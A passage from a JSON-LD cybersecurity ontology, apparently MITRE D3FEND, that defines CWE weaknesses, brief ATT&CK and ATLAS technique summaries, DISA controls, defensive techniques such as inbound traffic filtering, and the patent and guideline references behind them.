          "@id": "_:Ncb7a000c5a5a4cf99bdd935a2002f130"
        }
      ]
    },
    {
      "@id": "_:Ncb7a000c5a5a4cf99bdd935a2002f130",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:hides",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x hides y: A technique or operation x conceals the digital artifact y.",
      "rdfs:label": "hides",
      "rdfs:range": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-761",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-761",
      "d3f:definition": "The product calls free() on a pointer to a memory resource that was allocated on the heap, but the pointer is not at the start of the buffer.",
      "d3f:weakness-of": {
        "@id": "d3f:MemoryFreeFunction"
      },
      "rdfs:label": "Free of Pointer not at Start of Buffer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-763"
        },
        {
          "@id": "_:N7df7ff0ea6fa4969bed12b320795a567"
        }
      ]
    },
    {
      "@id": "_:N7df7ff0ea6fa4969bed12b320795a567",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryFreeFunction"
      }
    },
    {
      "@id": "d3f:StaticAnalysisTool",
      "@type": "owl:Class",
      "d3f:definition": "A static [program] analysis tool performs an automated analysis of computer software without actually executing programs, in contrast with dynamic analysis, which is analysis performed on programs while they are executing. In most cases the analysis is performed on some version of the source code, and in the other cases, some form of the object code.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Static_program_analysis"
      },
      "rdfs:label": "Static Analysis Tool",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Program_analysis"
        },
        {
          "@id": "dbr:Category:Program_analysis"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CodeAnalyzer"
      },
      "skos:altLabel": "Static Program Analysis Tool"
    },
    {
      "@id": "d3f:LogisticRegression",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LR",
      "d3f:definition": "Logistic regression is estimating the parameters of a logistic model.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Logistic regression. [Link](https://en.wikipedia.org/wiki/Logistic_regression)",
      "rdfs:label": "Logistic Regression",
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysis"
      }
    },
    {
      "@id": "d3f:OpticalModem",
      "@type": "owl:Class",
      "d3f:definition": "A modem that connects to a fiber optic network is known as an optical network terminal (ONT) or optical network unit (ONU). These are commonly used in fiber to the home installations, installed inside or outside a house to convert the optical medium to a copper Ethernet interface, after which a router or gateway is often installed to perform authentication, routing, NAT, and other typical consumer internet functions, in addition to \"triple play\" features such as telephony and television service.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Modem#Optical_modem"
      },
      "rdfs:label": "Optical Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:Modem"
      }
    },
    {
      "@id": "d3f:T1598.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.004",
      "d3f:definition": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.",
      "rdfs:label": "Spearphishing Voice",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:T1587.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.001",
      "d3f:definition": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)",
      "rdfs:label": "Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:CWE-619",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-619",
      "d3f:definition": "If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor \"dangling.\"",
      "rdfs:label": "Dangling Database Cursor ('Cursor Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-402"
      }
    },
    {
      "@id": "d3f:CCI-000877_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs strong authenticators in the establishment of nonlocal maintenance and diagnostic sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000877"
    },
    {
      "@id": "d3f:T1155",
      "@type": "owl:Class",
      "d3f:attack-id": "T1155",
      "d3f:definition": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1059.002",
      "rdfs:label": "AppleScript",
      "rdfs:seeAlso": {
        "@id": "d3f:T1059.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:installs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x installs y: An entity x sets up digital artifact y for subsequent use.  For example, an installation program can install application software.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01572394-v"
      },
      "rdfs:label": "installs",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:AML.TA0003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0003",
      "d3f:definition": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating,\npurchasing, or compromising/stealing resources that can be used to support targeting.\nSuch resources include AI artifacts, infrastructure, accounts, or capabilities.\nThese resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as [AI Attack Staging](/tactics/AML.TA0001).",
      "rdfs:label": "Resource Development - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Resource Development"
    },
    {
      "@id": "d3f:CCI-002411_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:IOPortRestriction"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability to dynamically isolate/segregate organization-defined information system components from other components of the system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002411"
    },
    {
      "@id": "d3f:T1560.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560.002",
      "d3f:creates": {
        "@id": "d3f:ArchiveFile"
      },
      "d3f:definition": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.",
      "rdfs:label": "Archive via Library",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1560"
        },
        {
          "@id": "_:N48d13e9752714b098a3ba9eed3e7e98d"
        }
      ]
    },
    {
      "@id": "_:N48d13e9752714b098a3ba9eed3e7e98d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:AuthenticationCacheInvalidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AuthenticationCacheInvalidation"
      ],
      "d3f:d3fend-id": "D3-ANCI",
      "d3f:definition": "Removing tokens or credentials from an authentication cache to prevent further user associated account accesses.",
      "d3f:deletes": {
        "@id": "d3f:Credential"
      },
      "d3f:kb-article": "## How it works\nApplications can locally cache user authentication credentials for certain server connections. An application may attempt to use the cached credential for a connection. If the cached credentials exist then the user will not be typically prompted for new credentials.\n\n\n## Considerations\nAre these cached credentials only on the local host? Can they be persisted to the remote server?\n\n## Examples\nWindows Credential Management API",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-SecureCachingOfServerCredentials_DellProductsLP"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForProvidingAnActivelyInvalidatedClient-sideNetworkResourceCache_IMVU"
        }
      ],
      "rdfs:label": "Authentication Cache Invalidation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "_:N5ba09852de20431bb927649ca59404b8"
        }
      ]
    },
    {
      "@id": "_:N5ba09852de20431bb927649ca59404b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:CWE-50",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-50",
      "d3f:definition": "The product accepts path input in the form of multiple leading slash ('//multiple/leading/slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '//multiple/leading/slash'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-161"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "Cybersecurity and Infrastructure Security Agency",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cybersecurity and Infrastructure Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:RegistryKeyDeletion"
      },
      "d3f:kb-reference-title": "Cybersecurity Incident & Vulnerability Response Playbooks",
      "rdfs:label": "Reference - Cybersecurity Incident and Vulnerability Response Playbooks"
    },
    {
      "@id": "d3f:CCI-001372_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, implements organization-defined security policy filters requiring fully enumerated formats that restrict data structure and content.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001372"
    },
    {
      "@id": "d3f:Reference-SAFESEH_ImageHasSafeExceptionHandlers_MicrosoftDocs",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/cpp/build/reference/safeseh-image-has-safe-exception-handlers?view=msvc-160"
      },
      "d3f:kb-abstract": "When /SAFESEH is specified, the linker will only produce an image if it can also produce a table of the image's safe exception handlers. This table specifies for the operating system which exception handlers are valid for the image.",
      "d3f:kb-author": "Mike Blome, Saisang Cai, Colin Robertson, Mike Jones, NextTurn, Gordon Hogenson",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExceptionHandlerPointerValidation"
      },
      "d3f:kb-reference-title": "/SAFESEH (Image has Safe Exception Handlers)",
      "rdfs:label": "Reference - /SAFESEH (Image has Safe Exception Handlers) - Microsoft Docs"
    },
    {
      "@id": "d3f:CWE-270",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-270",
      "d3f:definition": "The product does not properly manage privileges while it is switching between different contexts that have different privileges or spheres of control.",
      "rdfs:label": "Privilege Context Switching Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:T1574.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:attack-id": "T1574.012",
      "d3f:definition": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "COR_PROFILER",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N1f025f6a7a4e4678b3c4ab9acda122c3"
        },
        {
          "@id": "_:N8f1b7ccb964048ffbd2d237af24d0e0f"
        }
      ]
    },
    {
      "@id": "_:N1f025f6a7a4e4678b3c4ab9acda122c3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N8f1b7ccb964048ffbd2d237af24d0e0f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:d3fend-kb-reference-annotation",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x d3fend-kb-data-property y: The reference x has the data property y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "d3fend-kb-reference-annotation",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-annotation-property"
      }
    },
    {
      "@id": "d3f:InboundTrafficFiltering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:InboundTrafficFiltering"
      ],
      "d3f:d3fend-id": "D3-ITF",
      "d3f:definition": "Restricting network traffic originating from untrusted networks destined towards a private host or enclave.",
      "d3f:filters": {
        "@id": "d3f:InboundNetworkTraffic"
      },
      "d3f:kb-article": "## How it works\nInbound Traffic, in this context, is network traffic originating from an untrusted network towards a private host or enclave.\nFor example:\n\n* An untrusted network host connecting to a internal commercial portal, shopping.example.com\n* An external mail server connecting to an internal mail server, mail.example.com\n\nFiltering policies are developed by administrators to meet business requirements and limit connectivity. These policies are implemented on edge devices such as firewalls, routers, and intrusion prevention systems. Examples of filters:\n\n* Blocking incoming traffic from spoofed internally facing IP addresses\n* Blocking specific ports and services from establishing connections\n* Limiting specific IP ranges from connecting to the network\n* Dynamic inbound filtering (Hole punching, STUN, NAT-T)\n\n## Considerations\n* Business requirements typically drive the development of filtering rulesets\n* Protocols using non-standard ports may circumvent filtering technology, which does not detect application protocol based on traffic content\n\n## Implementations\n* OpenWRT (Embedded)\n* Netfilter (Linux)\n* Windows Firewall\n* pf(BSD)",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ActiveFirewallSystemAndMethodology_McAfeeLLC"
        },
        {
          "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft"
        },
        {
          "@id": "d3f:Reference-FWTK-FirewallToolkit_"
        },
        {
          "@id": "d3f:Reference-FirewallForInterentAccess_SecureComputingLLC"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingAConnectionlessNetworkPacket_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallForProcessingConnection-orientedAndConnectionlessDatagramsOverAConnection-orientedNetwork_NationalSecurityAgency"
        },
        {
          "@id": "d3f:Reference-FirewallsThatFilterBasedUponProtocolCommands_IntelCorp"
        },
        {
          "@id": "d3f:Reference-MethodForControllingComputerNetworkSecurity_CheckpointSoftwareTechnologiesLtd"
        },
        {
          "@id": "d3f:Reference-NetworkFirewallWithProxy_SecureComputingLLC"
        }
      ],
      "rdfs:label": "Inbound Traffic Filtering",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficFiltering"
        },
        {
          "@id": "_:N07bdb26ce5a848e49cf0e209f9f8ce77"
        }
      ]
    },
    {
      "@id": "_:N07bdb26ce5a848e49cf0e209f9f8ce77",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WindowsTerminateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Terminates the specified process and all of its threads.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtTerminateProcess"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-terminateprocess"
      },
      "rdfs:label": "Windows TerminateProcess",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPITerminateProcess"
        },
        {
          "@id": "_:N0f1e3be120374e40a0f152d5aba15d85"
        }
      ]
    },
    {
      "@id": "_:N0f1e3be120374e40a0f152d5aba15d85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtTerminateProcess"
      }
    },
    {
      "@id": "d3f:Reference-ComputationalModelingAndClassificationOfDataStreams_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180197089A1/en?oq=US-2018197089-A1"
      },
      "d3f:kb-abstract": "Example techniques described herein determine a signature or classification of a data stream such as a file. The classification can indicate whether the data stream is associated with malware. A processor can locate training analysis regions of training data streams based on predetermined structure data, and determining training model inputs based on the training analysis regions. The processor can determine a computational model based on the training model inputs. The computational model can receive an input vector and provide a corresponding feature vector. The processor can then locate a trial analysis region of a trial data stream based on the predetermined structure data and determine a trial model input. The processor can operate the computational model based on the trial model input to provide a trial feature vector, e.g., a signature. The processor can operate a second computational model to provide a classification based on the signature.",
      "d3f:kb-author": "Sven Krasser; David Elkind; Patrick Crenshaw; Brett Meyer",
      "d3f:kb-mitre-analysis": "Provides a mechanism to classify files using file signatures based on a computational model. Training data that comprises at least a portion of a file, e.g. number of bytes, is used as input to the computational model to develop a file signature and classify the file as malware.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:kb-reference-title": "Computational modeling and classification of data streams",
      "rdfs:label": "Reference - Computational modeling and classification of data streams - Crowdstrike Inc"
    },
    {
      "@id": "d3f:DefensiveAction",
      "@type": "owl:Class",
      "rdfs:label": "Defensive Action",
      "rdfs:subClassOf": {
        "@id": "d3f:CyberAction"
      }
    },
    {
      "@id": "d3f:CWE-1057",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1057",
      "d3f:definition": "The product uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager.",
      "rdfs:label": "Data Access Operations Outside of Expected Data Manager Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:SatelliteTransponder",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A communications satellite's transponder is the series of interconnected units that form a communications channel between the receiving and the transmitting antennas.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Transponder_(satellite_communications)"
      },
      "rdfs:label": "Satellite Transponder",
      "rdfs:subClassOf": {
        "@id": "d3f:Transponder"
      }
    },
    {
      "@id": "d3f:CWE-479",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-479",
      "d3f:definition": "The product defines a signal handler that calls a non-reentrant function.",
      "rdfs:label": "Signal Handler Use of a Non-reentrant Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-663"
        },
        {
          "@id": "d3f:CWE-828"
        }
      ]
    },
    {
      "@id": "d3f:NetworkResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:NetworkResource"
        },
        {
          "@id": "d3f:Resource"
        }
      ],
      "d3f:definition": "Ephemeral digital artifact comprising a request of a network resource and any response from that network resource.",
      "rdfs:label": "Network Resource Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ResourceAccess"
        },
        {
          "@id": "_:N688ed6849e0a4e3c92ade407e268bfe8"
        },
        {
          "@id": "_:Nf60602bfe91c486eb31199cbf1ae1290"
        }
      ]
    },
    {
      "@id": "_:N688ed6849e0a4e3c92ade407e268bfe8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkResource"
      }
    },
    {
      "@id": "_:Nf60602bfe91c486eb31199cbf1ae1290",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:CWE-1246",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1246",
      "d3f:definition": "The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories.",
      "rdfs:label": "Improper Write Handling in Limited-write Non-Volatile Memories",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:SystemCall",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. This may include hardware-related services (for example, accessing a hard disk drive), creation and execution of new processes, and communication with integral kernel services such as process scheduling. System calls provide an essential interface between a process and the operating system.",
      "d3f:executes": {
        "@id": "d3f:Subroutine"
      },
      "d3f:synonym": "syscall",
      "rdfs:isDefinedBy": {
        "@id": "dbr:System_call"
      },
      "rdfs:label": "System Call",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Nb5b3dbe39beb41dbb6caaf43a8b2148b"
        }
      ]
    },
    {
      "@id": "_:Nb5b3dbe39beb41dbb6caaf43a8b2148b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CWE-111",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-111",
      "d3f:definition": "When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.",
      "rdfs:label": "Direct Use of Unsafe JNI",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:CWE-396",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-396",
      "d3f:definition": "Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.",
      "rdfs:label": "Declaration of Catch for Generic Exception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-221"
        },
        {
          "@id": "d3f:CWE-705"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:T1136.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136.001",
      "d3f:creates": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:definition": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.",
      "rdfs:label": "Local Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1136"
        },
        {
          "@id": "_:N4c90b4e7726248f1a9b8f2d828283e8c"
        }
      ]
    },
    {
      "@id": "_:N4c90b4e7726248f1a9b8f2d828283e8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:T1219",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1219",
      "d3f:definition": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Remote Access Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nd9798ecfa3984737bd32fe3cf93dcbd5"
        }
      ]
    },
    {
      "@id": "_:Nd9798ecfa3984737bd32fe3cf93dcbd5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:issued",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date of formal issuance of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date issued"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:AML.T0041",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0041",
      "d3f:definition": "In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks.\nIf the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected.\nBy modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.",
      "rdfs:label": "Physical Environment Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0041"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIModelAccessTechnique"
      },
      "skos:prefLabel": "Physical Environment Access"
    },
    {
      "@id": "d3f:WindowsNtCreateProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateProcess",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-614",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-614",
      "d3f:definition": "The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session.",
      "rdfs:label": "Sensitive Cookie in HTTPS Session Without 'Secure' Attribute",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-319"
      }
    },
    {
      "@id": "d3f:T1562.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.007",
      "d3f:definition": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).",
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Disable or Modify Cloud Firewall",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N026ce6ded7fb46d5825b49a10b562322"
        }
      ]
    },
    {
      "@id": "_:N026ce6ded7fb46d5825b49a10b562322",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:T1560.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560.001",
      "d3f:creates": {
        "@id": "d3f:ArchiveFile"
      },
